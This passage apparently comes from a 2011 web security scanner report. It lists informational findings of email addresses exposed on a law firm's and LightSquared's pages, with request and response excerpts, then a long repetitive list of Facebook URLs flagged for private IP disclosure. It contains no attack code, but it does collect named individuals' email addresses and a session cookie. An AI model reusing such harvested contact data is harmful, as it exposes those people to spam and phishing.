User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:10:42 GMT
Content-Length: 28988
Content-Type: text/html
Last-Modified: Thu, 16 Jun 2011 17:55:54 GMT
Accept-Ranges: bytes
ETag: "aaa253a34e2ccc1:6b9"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="robots" content="index, follow"><META HTTP-EQUIV="CACHE-CONTROL" CONTEN
...[SNIP]...
<A href="mailto:cwilson@flsd.com">
...[SNIP]...
<FONT size=2>blemann@flsd.com</FONT>
...[SNIP]...
<A href="mailto:cwilson@flsd.com">
...[SNIP]...
<FONT size=2>mschaefer@flsd.com</FONT>
...[SNIP]...
<A href="mailto:tdominick@flsd.com" editor_id="mce_editor_0"><FONT color=#000066 size=2 face=Arial editor_id="mce_editor_0">tdominick@flsd.com</FONT>
...[SNIP]...
<A href="mailto:cwilson@flsd.com" editor_id="mce_editor_0"><FONT color=#000066 size=2 face=Arial editor_id="mce_editor_0">cwilson@flsd.com</FONT>
...[SNIP]...
<A href="mailto:dholden@flsd.com" editor_id="mce_editor_0"><FONT face=Arial color=#000066 size=2>dholden@flsd.com</FONT>
...[SNIP]...
<A href="mailto:dcolella@flsd.com" editor_id="mce_editor_0"><FONT face=Arial color=#000066 size=2 editor_id="mce_editor_0">dcolella@flsd.com</FONT>
...[SNIP]...
<A href="mailto:adavison@flsd.com" editor_id="mce_editor_0"><FONT color=#000066 size=2 face=Arial editor_id="mce_editor_0">adavison@flsd.com</FONT>
...[SNIP]...
<A href="mailto:ahatti@flsd.com" editor_id="mce_editor_0"><FONT color=#000066 size=2 face=Arial editor_id="mce_editor_0">ahatti@flsd.com</FONT>
...[SNIP]...
<A CLASS="undefined" EDITOR_ID="mce_editor_0" HREF="mailto:lmadinger@flsd.com" TARGET="null" MCE_REAL_HREF="mailto:lmadinger@flsd.com" ><FONT color=#000066 size=2 face=Arial editor_id="mce_editor_0">lmadinger@flsd.com</FONT>
...[SNIP]...

18.30. http://www.inlandbusinesslaw.com/contactus.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inlandbusinesslaw.com
Path:	/contactus.html

Issue detail

The following email addresses were disclosed in the response:

cwilson@inlandbusinesslaw.com
info@flsd.com
info@inlandbusinesslaw.com

Request

GET /contactus.html HTTP/1.1
Host: www.inlandbusinesslaw.com
Proxy-Connection: keep-alive
Referer: http://www.inlandbusinesslaw.com/attorneyprofiles.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:10:51 GMT
Content-Length: 10361
Content-Type: text/html
Last-Modified: Thu, 16 Jun 2011 17:55:54 GMT
Accept-Ranges: bytes
ETag: "88dc6da34e2ccc1:6b9"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="robots" content="index, follow"><META HTTP-EQUIV="CACHE-CONTROL" CONTEN
...[SNIP]...
<A href="mailto:info@flsd.com"><FONT face="arial, verdana, sans-serif" color=#0000ff size=2 editor_id="mce_editor_0">info@flsd.com</FONT>
...[SNIP]...
<A href="mailto:info@inlandbusinesslaw.com" editor_id="mce_editor_0"><FONT color=#0000ff>info@inlandbusinesslaw.com</FONT>
...[SNIP]...
<A href="mailto:cwilson@inlandbusinesslaw.com">
...[SNIP]...

18.31. http://www.inlandbusinesslaw.com/scripts/user.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inlandbusinesslaw.com
Path:	/scripts/user.js

Issue detail

The following email address was disclosed in the response:

email@example.com

Request

GET /scripts/user.js HTTP/1.1
Host: www.inlandbusinesslaw.com
Proxy-Connection: keep-alive
Referer: http://www.inlandbusinesslaw.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 21:20:01 GMT
Content-Length: 23762
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Jun 2011 17:55:54 GMT
Accept-Ranges: bytes
ETag: "2cefda24e2ccc1:6b9"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

// ----------------------------------------------
// This function dynamically generates flash file
// parameters.
// -----------------------------------------------
function viewFlash(src, w, h, loop
...[SNIP]...
<toEmailArr.length;i++) { if(filter.test(toEmailArr[i].replace(/^\\s\\s*/, "").replace(/\\s\\s*$/, ""))){ continue; }else{ alert("Please enter a valid e-mail address (e.g. email@example.com)."); return false; } } if (filter.test(fromEmail)) { return true; } else { alert("Please enter a valid e-mail address (e.g. email@example.com)."); return false; } } function onClickForm(){ document.site_refer.return_url.value=window.location.href; alert("Thank you. Your message has been submitted."); self.close(); } </script>
...[SNIP]...

18.32. http://www.lightsquared.com/contact-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightsquared.com
Path:	/contact-us/

Issue detail

The following email addresses were disclosed in the response:

name@domain.com
vendors@lightsquared.com

Request

GET /contact-us/ HTTP/1.1
Host: www.lightsquared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=o8lr5d4di75ipopo7a9ll7olo7; __utmz=243918744.1308221421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243918744.800402778.1308221421.1308221421.1308221421.1; __utmc=243918744; __utmb=243918744.1.10.1308221421

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:50:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.lightsquared.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<a href="mailto:vendors@lightsquared.com?subject=Vendor Inquiry - Network Deployment">
...[SNIP]...
e enter your first name",
                           l_name: "Please enter your last name",
                           email: {
                               required: "Please enter your email address",
                               email: "Your email address must be in the format of name@domain.com"
                           },
                           c_email: "The email and confirm email addresses do not match",
                           company: "Please enter your company",
                           address: "Please enter your address",
                           lineOfBusiness: "Pleas
...[SNIP]...

18.33. http://www.lightsquared.com/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightsquared.com
Path:	/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/

Issue detail

The following email addresses were disclosed in the response:

Audrey@schaefer.com
amy.rosenberg@bm.com
chris.stern@bm.com
dnmiller@cellularsouth.com
joshua.lefkowtitz@bm.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:51:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.lightsquared.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<a href="mailto:Audrey@schaefer.com">Audrey@schaefer.com</a>
...[SNIP]...
<a href="mailto:dnmiller@cellularsouth.com">dnmiller@cellularsouth.com</a>
...[SNIP]...
<a href="mailto:amy.rosenberg@bm.com">amy.rosenberg@bm.com</a>
...[SNIP]...
<a href="mailto:joshua.lefkowtitz@bm.com">joshua.lefkowtitz@bm.com</a>
...[SNIP]...
<a href="mailto:chris.stern@bm.com">chris.stern@bm.com<br />
...[SNIP]...

18.34. http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightsquared.com
Path:	/wp-content/themes/lightsquared/js/lightsquared.js

Issue detail

The following email address was disclosed in the response:

name@domain.com

Request

Response

19. Private IP addresses disclosed previous next
There are 991 instances of this issue:

http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check4.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://connect.facebook.net/en_US/all.js
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
https://services.wsj.com/Gryphon/javascripts/s_code_ps.js
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/5YkCKQk_Uwd.js
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/H7He8TCHOS8.js
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/WzO4x8ghoO7.js
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/WzO4x8ghoO7.js
http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/EMbN9YbXDOI.js
http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/EMbN9YbXDOI.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/IqATM6kdESm.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/rtDNAXiTAA6.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js
http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/58rT2Q2u2Tj.js
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/iTSK7icHWCE.js
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/iTSK7icHWCE.js
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/vX9_1hezWgO.js
http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png
http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png
http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png
http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
